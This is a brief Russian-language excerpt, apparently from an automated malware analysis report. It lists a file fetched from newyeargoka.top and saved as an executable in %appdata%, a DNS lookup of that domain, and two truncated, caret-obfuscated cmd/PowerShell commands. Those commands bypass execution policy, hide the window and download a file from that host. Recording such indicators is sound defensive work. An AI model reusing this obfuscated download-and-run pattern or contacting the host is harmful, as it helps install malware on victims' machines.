Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWERs^heLl^.^E^x^e -eX^ECu^TioN^P^oLI^CY^ B^Ypa^ss -NoprOfILe -WIn^dowstYLE hIdDeN ^(^NeW^-o^bje^CT^ S^YsTeM^.Net^.W^EbcL^i^eN^T^)^.^D^OW^N^L^O^aD^fIlE('http://newyeargok...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "POWERs^heLl^.^E^x^e -eX^ECu^TioN^P^oLI^CY^ B^Ypa^ss -NoprOfILe -WIn^dowstYLE hIdDeN ^(^NeW^-o^bje^CT^ S^YsTeM^.Net^.W^EbcL^i^eN^T^)^.^D^OW^N^L^O^aD^fIlE('http://newyeargok...' (со скрытым окном)